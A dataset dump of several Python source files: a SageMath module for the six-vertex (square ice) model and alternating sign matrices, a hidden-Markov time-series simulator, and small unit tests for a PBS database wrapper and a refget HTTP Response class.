next_top = [False, False, True, True, False, True]
next_left = [True, False, False, False, True, True]
check_top = [True, False, True, False, False, True]
check_left = [False, False, False, True, True, True]
bdry = [self._bdry_cond[0]]
lbd = list(self._bdry_cond[3]) + [None] # Dummy
left = [ [lbd[0]] ]
cur = [[-1]]
n = self._nrows
m = self._ncols
# [[3, 1], [5, 3]]
# [[4, 3], [3, 2]]
while len(cur) > 0:
# If we're at the last row
if len(cur) > n:
cur.pop()
left.pop()
# Check if all our bottom boundry conditions are statisfied
if all(x is not self._bdry_cond[2][i]
for i,x in enumerate(bdry[-1])):
yield self.element_class(self, tuple(tuple(x) for x in cur))
bdry.pop()
# Find the next row
row = cur[-1]
l = left[-1]
i = len(cur) - 1
while len(row) > 0:
row[-1] += 1
# Check to see if we have more vertices
if row[-1] > 5:
row.pop()
l.pop()
continue
# Check to see if we can add the vertex
if (check_left[row[-1]] is l[-1] or l[-1] is None) \
and (check_top[row[-1]] is bdry[-1][len(row)-1]
or bdry[-1][len(row)-1] is None):
if len(row) != m:
l.append(next_left[row[-1]])
row.append(-1)
# Check the right bdry condition since we are at the rightmost entry
elif next_left[row[-1]] is not self._bdry_cond[1][i]:
bdry.append([next_top[x] for x in row])
cur.append([-1])
left.append([lbd[i+1]])
break
# If we've killed this row, backup
if len(row) == 0:
cur.pop()
bdry.pop()
left.pop()
def boundary_conditions(self):
"""
Return the boundary conditions of ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M.boundary_conditions()
((False, False), (True, True), (False, False), (True, True))
"""
return self._bdry_cond
def partition_function(self, beta, epsilon):
r"""
Return the partition function of ``self``.
The partition function of a 6 vertex model is defined by:
.. MATH::
Z = \sum_{\nu} e^{-\beta E(\nu)}
where we sum over all configurations and `E` is the energy function.
The constant `\beta` is known as the *inverse temperature* and is
equal to `1 / k_B T` where `k_B` is Boltzmann's constant and `T` is
the system's temperature.
INPUT:
- ``beta`` -- the inverse temperature constant `\beta`
- ``epsilon`` -- the energy constants, see
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.energy()`
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M.partition_function(2, [1,2,1,2,1,2])
e^(-24) + 2*e^(-28) + e^(-30) + 2*e^(-32) + e^(-36)
REFERENCES:
:wikipedia:`Partition_function_(statistical_mechanics)`
"""
from sage.functions.log import exp
return sum(exp(-beta * nu.energy(epsilon)) for nu in self)
class SquareIceModel(SixVertexModel):
r"""
The square ice model.
The square ice model is a 6 vertex model on an `n \times n` grid with
the boundary conditions that the top and bottom boundaries are pointing
outward and the left and right boundaries are pointing inward. These
boundary conditions are also called domain wall boundary conditions.
Configurations of the 6 vertex model with domain wall boundary conditions
are in bijection with alternating sign matrices.
"""
def __init__(self, n):
"""
Initialize ``self``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: TestSuite(M).run()
"""
boundary_conditions = ((False,)*n, (True,)*n)*2
SixVertexModel.__init__(self, n, n, boundary_conditions)
def from_alternating_sign_matrix(self, asm):
"""
Return a configuration from the alternating sign matrix ``asm``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: asm = AlternatingSignMatrix([[0,1,0],[1,-1,1],[0,1,0]])
sage: M.from_alternating_sign_matrix(asm)
^ ^ ^
| | |
--> # -> # <- # <--
^ | ^
| V |
--> # <- # -> # <--
| ^ |
V | V
--> # -> # <- # <--
| | |
V V V
TESTS::
sage: M = SixVertexModel(5, boundary_conditions='ice')
sage: ASM = AlternatingSignMatrices(5)
sage: all(M.from_alternating_sign_matrix(x.to_alternating_sign_matrix()) == x
....: for x in M)
True
sage: all(M.from_alternating_sign_matrix(x).to_alternating_sign_matrix() == x
....: for x in ASM)
True
"""
if asm.parent().size() != self._nrows:
raise ValueError("mismatched size")
#verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
ret = []
bdry = [False]*self._nrows # False = up
for row in asm.to_matrix():
cur = []
right = True # True = right
for j,entry in enumerate(row):
if entry == -1:
cur.append(0)
right = True
bdry[j] = False
elif entry == 1:
cur.append(3)
right = False
bdry[j] = True
else: # entry == 0
if bdry[j]:
if right:
cur.append(5)
else:
cur.append(2)
else:
if right:
cur.append(4)
else:
cur.append(1)
ret.append(tuple(cur))
return self.element_class(self, tuple(ret))
class Element(SixVertexConfiguration):
"""
An element in the square ice model.
"""
@combinatorial_map(name='to alternating sign matrix')
def to_alternating_sign_matrix(self):
"""
Return an alternating sign matrix of ``self``.
.. SEEALSO::
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.to_signed_matrix()`
EXAMPLES::
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: M[6].to_alternating_sign_matrix()
[1 0 0 0]
[0 0 0 1]
[0 0 1 0]
[0 1 0 0]
sage: M[7].to_alternating_sign_matrix()
[ 0 1 0 0]
[ 1 -1 1 0]
[ 0 1 -1 1]
[ 0 0 1 0]
"""
from sage.combinat.alternating_sign_matrix import AlternatingSignMatrix #AlternatingSignMatrices
#ASM = AlternatingSignMatrices(self.parent()._nrows)
#return ASM(self.to_signed_matrix())
return AlternatingSignMatrix(self.to_signed_matrix())
| 33.017949 | 108 | 0.435117 | r"""
Six Vertex Model
"""
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.list_clone import ClonableArray
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
from sage.combinat.combinatorial_map import combinatorial_map
class SixVertexConfiguration(ClonableArray):
"""
A configuration in the six vertex model.
"""
def check(self):
"""
Check if ``self`` is a valid 6 vertex configuration.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M[0].check()
"""
if self not in self.parent():
raise ValueError("invalid configuration")
def _repr_(self):
"""
Return a string representation of ``self``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M[0]
^ ^ ^
| | |
--> # <- # <- # <--
| ^ ^
V | |
--> # -> # <- # <--
| | ^
V V |
--> # -> # -> # <--
| | |
V V V
"""
# List are in the order of URDL
ascii = [[r' V ', ' -', r' ^ ', '- '], # LR
[r' | ', ' <', r' ^ ', '- '], # LU
[r' V ', ' <', r' | ', '- '], # LD
[r' | ', ' <', r' | ', '> '], # UD
[r' | ', ' -', r' ^ ', '> '], # UR
[r' V ', ' -', r' | ', '> ']] # RD
ret = ' '
# Do the top line
for entry in self[0]:
if entry == 1 or entry == 3 or entry == 4:
ret += ' ^ '
else:
ret += ' | '
# Do the meat of the ascii art
for row in self:
ret += '\n '
# Do the top row
for entry in row:
ret += ascii[entry][0]
ret += '\n'
# Do the left-most entry
if row[0] == 0 or row[0] == 1 or row[0] == 2:
ret += '<-'
else:
ret += '--'
# Do the middle row
for entry in row:
ret += ascii[entry][3] + '#' + ascii[entry][1]
# Do the right-most entry
if row[-1] == 0 or row[-1] == 4 or row[-1] == 5:
ret += '->'
else:
ret += '--'
# Do the bottom row
ret += '\n '
for entry in row:
ret += ascii[entry][2]
# Do the bottom line
ret += '\n '
for entry in self[-1]:
if entry == 2 or entry == 3 or entry == 5:
ret += ' V '
else:
ret += ' | '
return ret
def to_signed_matrix(self):
"""
Return the signed matrix of ``self``.
The signed matrix corresponding to a six vertex configuration is
given by `0` if there is a cross flow, a `1` if the outward arrows
are vertical and `-1` if the outward arrows are horizonal.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: map(lambda x: x.to_signed_matrix(), M)
[
[1 0 0] [1 0 0] [ 0 1 0] [0 1 0] [0 1 0] [0 0 1] [0 0 1]
[0 1 0] [0 0 1] [ 1 -1 1] [1 0 0] [0 0 1] [1 0 0] [0 1 0]
[0 0 1], [0 1 0], [ 0 1 0], [0 0 1], [1 0 0], [0 1 0], [1 0 0]
]
"""
from sage.matrix.constructor import matrix
# verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
def matrix_sign(x):
if x == 0:
return -1
if x == 3:
return 1
return 0
return matrix([[matrix_sign(_) for _ in row] for row in self])
def plot(self, color='sign'):
"""
Return a plot of ``self``.
INPUT:
- ``color`` -- can be any of the following:
* ``4`` - use 4 colors: black, red, blue, and green with each
corresponding to up, right, down, and left respectively
* ``2`` - use 2 colors: red for horizontal, blue for vertical arrows
* ``'sign'`` - use red for right and down arrows, blue for left
and up arrows
* a list of 4 colors for each direction
* a function which takes a direction and a boolean corresponding
to the sign
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: print M[0].plot().description()
Arrow from (-1.0,0.0) to (0.0,0.0)
Arrow from (-1.0,1.0) to (0.0,1.0)
Arrow from (0.0,0.0) to (0.0,-1.0)
Arrow from (0.0,0.0) to (1.0,0.0)
Arrow from (0.0,1.0) to (0.0,0.0)
Arrow from (0.0,1.0) to (0.0,2.0)
Arrow from (1.0,0.0) to (1.0,-1.0)
Arrow from (1.0,0.0) to (1.0,1.0)
Arrow from (1.0,1.0) to (0.0,1.0)
Arrow from (1.0,1.0) to (1.0,2.0)
Arrow from (2.0,0.0) to (1.0,0.0)
Arrow from (2.0,1.0) to (1.0,1.0)
"""
from sage.plot.graphics import Graphics
from sage.plot.circle import circle
from sage.plot.arrow import arrow
if color == 4:
color_list = ['black', 'red', 'blue', 'green']
cfunc = lambda d,pm: color_list[d]
elif color == 2:
cfunc = lambda d,pm: 'red' if d % 2 == 0 else 'blue'
elif color == 1 or color is None:
cfunc = lambda d,pm: 'black'
elif color == 'sign':
cfunc = lambda d,pm: 'red' if pm else 'blue' # RD are True
elif isinstance(color, (list, tuple)):
cfunc = lambda d,pm: color[d]
else:
cfunc = color
G = Graphics()
for j,row in enumerate(reversed(self)):
for i,entry in enumerate(row):
if entry == 0: # LR
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 1: # LU
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 2: # LD
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 3: # UD
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
elif entry == 4: # UR
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
elif entry == 5: # RD
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
G.axes(False)
return G
def energy(self, epsilon):
r"""
Return the energy of the configuration.
The energy of a configuration `\nu` is defined as
.. MATH::
E(\nu) = n_0 \epsilon_0 + n_1 \epsilon_1 + \cdots + n_5 \epsilon_5
where `n_i` is the number of vertices of type `i` and
`\epsilon_i` is the `i`-th energy constant.
.. NOTE::
We number our configurations as:
0. LR
1. LU
2. LD
3. UD
4. UR
5. RD
which differs from :wikipedia:`Ice-type_model`.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: nu = M[2]; nu
^ ^ ^
| | |
--> # -> # <- # <--
^ | ^
| V |
--> # <- # -> # <--
| ^ |
V | V
--> # -> # <- # <--
| | |
V V V
sage: nu.energy([1,2,1,2,1,2])
15
A KDP energy::
sage: nu.energy([1,1,0,1,0,1])
7
A Rys `F` energy::
sage: nu.energy([0,1,1,0,1,1])
4
The zero field assumption::
sage: nu.energy([1,2,3,1,3,2])
15
"""
if len(epsilon) != 6:
raise ValueError("there must be 6 energy constants")
return sum(epsilon[entry] for row in self for entry in row)
class SixVertexModel(UniqueRepresentation, Parent):
"""
The six vertex model.
We model a configuration by indicating which configuration by the
following six configurations which are determined by the two outgoing
arrows in the Up, Right, Down, Left directions:
1. LR::
|
V
<-- # -->
^
|
2. LU::
^
|
<-- # <--
^
|
3. LD::
|
V
<-- # <--
|
V
4. UD::
^
|
--> # <--
|
V
5. UR::
^
|
--> # -->
^
|
6. RD::
|
V
--> # -->
|
V
INPUT:
- ``n`` -- the number of rows
- ``m`` -- (optional) the number of columns, if not specified, then
the number of columns is the number of rows
- ``boundary_conditions`` -- (optional) a quadruple of tuples whose
entries are either:
* ``True`` for an inward arrow,
* ``False`` for an outward arrow, or
* ``None`` for no boundary condition.
There are also the following predefined boundary conditions:
* ``'ice'`` - The top and bottom boundary conditions are outward and the
left and right boundary conditions are inward; this gives the square
ice model. Also called domain wall boundary conditions.
* ``'domain wall'`` - Same as ``'ice'``.
* ``'alternating'`` - The boundary conditions alternate between inward
and outward.
* ``'free'`` - There are no boundary conditions.
EXAMPLES:
Here are the six types of vertices that can be created::
sage: M = SixVertexModel(1)
sage: list(M)
[
| ^ | ^ ^ |
V | V | | V
<-- # --> <-- # <-- <-- # <-- --> # <-- --> # --> --> # -->
^ ^ | | ^ |
| , | , V , V , | , V
]
When using the square ice model, it is known that the number of
configurations is equal to the number of alternating sign matrices::
sage: M = SixVertexModel(1, boundary_conditions='ice')
sage: len(M)
1
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: len(M)
42
sage: all(len(SixVertexModel(n, boundary_conditions='ice'))
....: == AlternatingSignMatrices(n).cardinality() for n in range(1, 7))
True
An example with a specified non-standard boundary condition and
non-rectangular shape::
sage: M = SixVertexModel(2, 1, [[None], [True,True], [None], [None,None]])
sage: list(M)
[
^ ^ | ^
| | V |
<-- # <-- <-- # <-- <-- # <-- --> # <--
^ ^ | |
| | V V
<-- # <-- --> # <-- <-- # <-- <-- # <--
^ | | |
| , V , V , V
]
REFERENCES:
- :wikipedia:`Vertex_model`
- :wikipedia:`Ice-type_model`
"""
@staticmethod
def __classcall_private__(cls, n, m=None, boundary_conditions=None):
"""
Normalize input to ensure a unique representation.
EXAMPLES::
sage: M1 = SixVertexModel(1, boundary_conditions=[[False],[True],[False],[True]])
sage: M2 = SixVertexModel(1, 1, ((False,),(True,),(False,),(True,)))
sage: M1 is M2
True
"""
if m is None:
m = n
if boundary_conditions is None or boundary_conditions == 'free':
boundary_conditions = ((None,)*m, (None,)*n)*2
elif boundary_conditions == 'alternating':
bdry = True
cond = []
for dummy in range(2):
val = []
for k in range(m):
val.append(bdry)
bdry = not bdry
cond.append(tuple(val))
val = []
for k in range(n):
val.append(bdry)
bdry = not bdry
cond.append(tuple(val))
boundary_conditions = tuple(cond)
elif boundary_conditions == 'ice' or boundary_conditions == 'domain wall':
if m == n:
return SquareIceModel(n)
boundary_conditions = ((False,)*m, (True,)*n)*2
else:
boundary_conditions = tuple(tuple(x) for x in boundary_conditions)
return super(SixVertexModel, cls).__classcall__(cls, n, m, boundary_conditions)
def __init__(self, n, m, boundary_conditions):
"""
Initialize ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: TestSuite(M).run()
"""
self._nrows = n
self._ncols = m
self._bdry_cond = boundary_conditions # Ordered URDL
Parent.__init__(self, category=FiniteEnumeratedSets())
def _repr_(self):
"""
Return a string representation of ``self``.
EXAMPLES::
sage: SixVertexModel(2, boundary_conditions='ice')
The six vertex model on a 2 by 2 grid
"""
return "The six vertex model on a {} by {} grid".format(self._nrows, self._ncols)
def _repr_option(self, key):
"""
Metadata about the ``_repr_()`` output.
See :meth:`sage.structure.parent._repr_option` for details.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M._repr_option('element_ascii_art')
True
"""
if key == 'element_ascii_art':
return True
return Parent._repr_option(self, key)
def _element_constructor_(self, x):
"""
Construct an element of ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M([[3,1],[5,3]])
^ ^
| |
--> # <- # <--
| ^
V |
--> # -> # <--
| |
V V
"""
if isinstance(x, SixVertexConfiguration):
if x.parent() is not self:
return self.element_class(self, tuple(x))
return x
verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
elt = []
for row in x:
elt.append([])
for entry in row:
if entry in verts:
elt[-1].append(verts.index(entry))
elif entry in range(6):
elt[-1].append(entry)
else:
raise ValueError("invalid entry")
elt[-1] = tuple(elt[-1])
return self.element_class(self, tuple(elt))
Element = SixVertexConfiguration
def __iter__(self):
"""
Iterate through ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: list(M)
[
^ ^ ^ ^
| | | |
--> # <- # <-- --> # -> # <--
| ^ ^ |
V | | V
--> # -> # <-- --> # <- # <--
| | | |
V V , V V
]
"""
# Boundary conditions ordered URDL
# The top row boundary condition of True is a downward arrow
# The left condition of True is a right arrow
# verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
next_top = [False, False, True, True, False, True]
next_left = [True, False, False, False, True, True]
check_top = [True, False, True, False, False, True]
check_left = [False, False, False, True, True, True]
bdry = [self._bdry_cond[0]]
lbd = list(self._bdry_cond[3]) + [None] # Dummy
left = [ [lbd[0]] ]
cur = [[-1]]
n = self._nrows
m = self._ncols
# [[3, 1], [5, 3]]
# [[4, 3], [3, 2]]
while len(cur) > 0:
# If we're at the last row
if len(cur) > n:
cur.pop()
left.pop()
# Check if all our bottom boundry conditions are statisfied
if all(x is not self._bdry_cond[2][i]
for i,x in enumerate(bdry[-1])):
yield self.element_class(self, tuple(tuple(x) for x in cur))
bdry.pop()
# Find the next row
row = cur[-1]
l = left[-1]
i = len(cur) - 1
while len(row) > 0:
row[-1] += 1
# Check to see if we have more vertices
if row[-1] > 5:
row.pop()
l.pop()
continue
# Check to see if we can add the vertex
if (check_left[row[-1]] is l[-1] or l[-1] is None) \
and (check_top[row[-1]] is bdry[-1][len(row)-1]
or bdry[-1][len(row)-1] is None):
if len(row) != m:
l.append(next_left[row[-1]])
row.append(-1)
# Check the right bdry condition since we are at the rightmost entry
elif next_left[row[-1]] is not self._bdry_cond[1][i]:
bdry.append([next_top[x] for x in row])
cur.append([-1])
left.append([lbd[i+1]])
break
# If we've killed this row, backup
if len(row) == 0:
cur.pop()
bdry.pop()
left.pop()
def boundary_conditions(self):
"""
Return the boundary conditions of ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M.boundary_conditions()
((False, False), (True, True), (False, False), (True, True))
"""
return self._bdry_cond
def partition_function(self, beta, epsilon):
r"""
Return the partition function of ``self``.
The partition function of a 6 vertex model is defined by:
.. MATH::
Z = \sum_{\nu} e^{-\beta E(\nu)}
where we sum over all configurations and `E` is the energy function.
The constant `\beta` is known as the *inverse temperature* and is
equal to `1 / k_B T` where `k_B` is Boltzmann's constant and `T` is
the system's temperature.
INPUT:
- ``beta`` -- the inverse temperature constant `\beta`
- ``epsilon`` -- the energy constants, see
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.energy()`
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M.partition_function(2, [1,2,1,2,1,2])
e^(-24) + 2*e^(-28) + e^(-30) + 2*e^(-32) + e^(-36)
REFERENCES:
:wikipedia:`Partition_function_(statistical_mechanics)`
"""
from sage.functions.log import exp
return sum(exp(-beta * nu.energy(epsilon)) for nu in self)
class SquareIceModel(SixVertexModel):
r"""
The square ice model.
The square ice model is a 6 vertex model on an `n \times n` grid with
the boundary conditions that the top and bottom boundaries are pointing
outward and the left and right boundaries are pointing inward. These
boundary conditions are also called domain wall boundary conditions.
Configurations of the 6 vertex model with domain wall boundary conditions
are in bijection with alternating sign matrices.
"""
def __init__(self, n):
"""
Initialize ``self``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: TestSuite(M).run()
"""
boundary_conditions = ((False,)*n, (True,)*n)*2
SixVertexModel.__init__(self, n, n, boundary_conditions)
def from_alternating_sign_matrix(self, asm):
"""
Return a configuration from the alternating sign matrix ``asm``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: asm = AlternatingSignMatrix([[0,1,0],[1,-1,1],[0,1,0]])
sage: M.from_alternating_sign_matrix(asm)
^ ^ ^
| | |
--> # -> # <- # <--
^ | ^
| V |
--> # <- # -> # <--
| ^ |
V | V
--> # -> # <- # <--
| | |
V V V
TESTS::
sage: M = SixVertexModel(5, boundary_conditions='ice')
sage: ASM = AlternatingSignMatrices(5)
sage: all(M.from_alternating_sign_matrix(x.to_alternating_sign_matrix()) == x
....: for x in M)
True
sage: all(M.from_alternating_sign_matrix(x).to_alternating_sign_matrix() == x
....: for x in ASM)
True
"""
if asm.parent().size() != self._nrows:
raise ValueError("mismatched size")
#verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
ret = []
bdry = [False]*self._nrows # False = up
for row in asm.to_matrix():
cur = []
right = True # True = right
for j,entry in enumerate(row):
if entry == -1:
cur.append(0)
right = True
bdry[j] = False
elif entry == 1:
cur.append(3)
right = False
bdry[j] = True
else: # entry == 0
if bdry[j]:
if right:
cur.append(5)
else:
cur.append(2)
else:
if right:
cur.append(4)
else:
cur.append(1)
ret.append(tuple(cur))
return self.element_class(self, tuple(ret))
class Element(SixVertexConfiguration):
"""
An element in the square ice model.
"""
@combinatorial_map(name='to alternating sign matrix')
def to_alternating_sign_matrix(self):
"""
Return an alternating sign matrix of ``self``.
.. SEEALSO::
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.to_signed_matrix()`
EXAMPLES::
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: M[6].to_alternating_sign_matrix()
[1 0 0 0]
[0 0 0 1]
[0 0 1 0]
[0 1 0 0]
sage: M[7].to_alternating_sign_matrix()
[ 0 1 0 0]
[ 1 -1 1 0]
[ 0 1 -1 1]
[ 0 0 1 0]
"""
from sage.combinat.alternating_sign_matrix import AlternatingSignMatrix #AlternatingSignMatrices
#ASM = AlternatingSignMatrices(self.parent()._nrows)
#return ASM(self.to_signed_matrix())
return AlternatingSignMatrix(self.to_signed_matrix())
| 116 | 0 | 30 |
c16c292b423a49e5404423c97562139f099ffc25 | 1,558 | py | Python | data/Simulated/simulate_data.py | mehdibnc/Bayesian_Time_Series_Classification | eb0df76c39dd81e40c94c004154a1ded443531a1 | [
"BSD-3-Clause"
] | 2 | 2020-03-09T09:55:07.000Z | 2020-05-20T08:00:42.000Z | data/Simulated/simulate_data.py | mehdibnc/Bayesian_Time_Series_Classification | eb0df76c39dd81e40c94c004154a1ded443531a1 | [
"BSD-3-Clause"
] | null | null | null | data/Simulated/simulate_data.py | mehdibnc/Bayesian_Time_Series_Classification | eb0df76c39dd81e40c94c004154a1ded443531a1 | [
"BSD-3-Clause"
] | 2 | 2019-12-06T17:54:41.000Z | 2020-02-13T18:11:30.000Z | import numpy as np
import random
import scipy
| 31.795918 | 110 | 0.646341 | import numpy as np
import random
import scipy
def generate_markov_seq(n_states, transition_matrix, len_seq, init_state=None):
states = [k for k in range(n_states)]
seq = []
if init_state:
x0 = init_state
else:
x0 = np.random.choice(states) #add initial probabilities
x_prev = x0
seq.append(x_prev)
for i in range(len_seq):
x_succ = np.where(np.random.multinomial(1, transition_matrix[x_prev, :], size=1) == 1)[1][0]
seq.append(x_succ)
x_prev = x_succ
return seq
def generate_transtion_matrix(n_states):
mat = []
for k in range(n_states):
row = np.random.random(n_states)
row = row / np.sum(row)
mat.append(list(row))
return np.array(mat)
def generate_series(hidden_seq, params):
T = len(hidden_seq)
y = []
for t in range(T):
mu_step = params[hidden_seq[t]][0]
sigma_step = params[hidden_seq[t]][1]
y.append(np.random.normal(mu_step, sigma_step))
return y
def generate_samples(n_sample, lengths_range, P, params, noise=0., init_state=None):
Y = []
for sample in range(n_sample):
n_states = P.shape[0]
T = np.random.randint(lengths_range[0], lengths_range[1])
hidden_seq = generate_markov_seq(n_states, P, T, init_state) #hidden states sequence
y = generate_series(hidden_seq, params) #time series following HMM model with hidden states and params
y = np.array(y) + np.random.random(len(y)) * noise #adding noise to series
Y.append(y)
return Y
| 1,417 | 0 | 92 |
ef47b645015237116a34d842a2f0e50b7986743b | 852 | py | Python | tests/t.py | zaber-paul/base | 9c4d4e40db7a5059dcaa32d44be0146b6bb829c4 | [
"Apache-2.0"
] | null | null | null | tests/t.py | zaber-paul/base | 9c4d4e40db7a5059dcaa32d44be0146b6bb829c4 | [
"Apache-2.0"
] | null | null | null | tests/t.py | zaber-paul/base | 9c4d4e40db7a5059dcaa32d44be0146b6bb829c4 | [
"Apache-2.0"
] | null | null | null | from builtins import object
from cloudmesh_base.base import HEADING
from cloudmesh_pbs.database import pbs_db, pbs_shelve
import os
| 23.027027 | 66 | 0.593897 | from builtins import object
from cloudmesh_base.base import HEADING
from cloudmesh_pbs.database import pbs_db, pbs_shelve
import os
class TestDatabase(object):
filename = "pbs.db"
def setup(self):
# HEADING()
self.db = pbs_db(self.filename, pbs_shelve)
def teardown(self):
# HEADING()
pass
"""
@classmethod
def setup_class(cls):
print ("setup_class() before any methods in this class")
@classmethod
def teardown_class(cls):
print ("teardown_class() after any methods in this class")
"""
def test_clear(self):
HEADING()
self.db.clear()
assert not os.path.isfile(self.filename)
def test_set(self):
HEADING()
self.db["element"] = "test"
assert self.db['element'] == "test"
| 285 | 411 | 24 |
eec8f79fbad64478516a5b0dade7f8244e1f9460 | 2,410 | py | Python | test/test_unit/test_ga4gh/test_refget/test_http/test_response.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | test/test_unit/test_ga4gh/test_refget/test_http/test_response.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | 3 | 2021-04-30T21:12:42.000Z | 2021-06-02T02:11:45.000Z | test/test_unit/test_ga4gh/test_refget/test_http/test_response.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Unit tests for Response class"""
import pytest
from ga4gh.refget.http.response import Response
from ga4gh.refget.http.status_codes import StatusCodes as SC
from ga4gh.refget.config.constants import CONTENT_TYPE_JSON_REFGET_VND, \
CONTENT_TYPE_TEXT_REFGET_VND
testdata_body = [
("ACGT"),
('{"message": "NOTFOUND"}'),
('''{"service": {"circular_supported": false}}''')
]
testdata_status_code = [
(SC.OK),
(SC.PARTIAL_CONTENT),
(SC.NOT_ACCEPTABLE)
]
testdata_header = [
("Content-Type", CONTENT_TYPE_JSON_REFGET_VND),
("Content-Type", CONTENT_TYPE_TEXT_REFGET_VND),
("Content-Type", "application/json")
]
testdata_data = [
("seqid", "ga4gh:SQ.HKyMuwwEWbdUDXfk5o1EGxGeqBmon6Sp"),
("subseq-type", "start-end"),
("subseq-type", "range")
]
testdata_redirect = [
("https://ga4gh.org"),
("https://example.com"),
("https://anotherexample.com")
]
@pytest.mark.parametrize("body", testdata_body)
@pytest.mark.parametrize("status_code", testdata_status_code)
@pytest.mark.parametrize("key,value", testdata_header)
@pytest.mark.parametrize("key,value", testdata_data)
@pytest.mark.parametrize("url", testdata_redirect)
| 29.390244 | 73 | 0.69834 | # -*- coding: utf-8 -*-
"""Unit tests for Response class"""
import pytest
from ga4gh.refget.http.response import Response
from ga4gh.refget.http.status_codes import StatusCodes as SC
from ga4gh.refget.config.constants import CONTENT_TYPE_JSON_REFGET_VND, \
CONTENT_TYPE_TEXT_REFGET_VND
testdata_body = [
("ACGT"),
('{"message": "NOTFOUND"}'),
('''{"service": {"circular_supported": false}}''')
]
testdata_status_code = [
(SC.OK),
(SC.PARTIAL_CONTENT),
(SC.NOT_ACCEPTABLE)
]
testdata_header = [
("Content-Type", CONTENT_TYPE_JSON_REFGET_VND),
("Content-Type", CONTENT_TYPE_TEXT_REFGET_VND),
("Content-Type", "application/json")
]
testdata_data = [
("seqid", "ga4gh:SQ.HKyMuwwEWbdUDXfk5o1EGxGeqBmon6Sp"),
("subseq-type", "start-end"),
("subseq-type", "range")
]
testdata_redirect = [
("https://ga4gh.org"),
("https://example.com"),
("https://anotherexample.com")
]
@pytest.mark.parametrize("body", testdata_body)
def test_body(body):
response = Response()
response.set_body(body)
assert response.get_body() == body
@pytest.mark.parametrize("status_code", testdata_status_code)
def test_status_code(status_code):
response = Response()
response.set_status_code(status_code)
assert response.get_status_code() == status_code
@pytest.mark.parametrize("key,value", testdata_header)
def test_header(key, value):
response = Response()
response.put_header(key, value)
assert response.get_header(key) == value
assert response.get_headers()[key] == value
new_dict = {"headerA": "valueA", "headerB": "valueB"}
response.update_headers(new_dict)
assert response.get_header(key) == value
assert response.get_headers()[key] == value
@pytest.mark.parametrize("key,value", testdata_data)
def test_data(key, value):
response = Response()
response.put_data(key, value)
assert response.get_datum(key) == value
assert response.get_data()[key] == value
new_dict = {"dataA": "valueA", "dataB": "valueB"}
response.update_data(new_dict)
assert response.get_datum(key) == value
assert response.get_data()[key] == value
@pytest.mark.parametrize("url", testdata_redirect)
def test_redirect(url):
response = Response()
response.set_redirect_found(url)
assert response.get_status_code() == SC.REDIRECT_FOUND
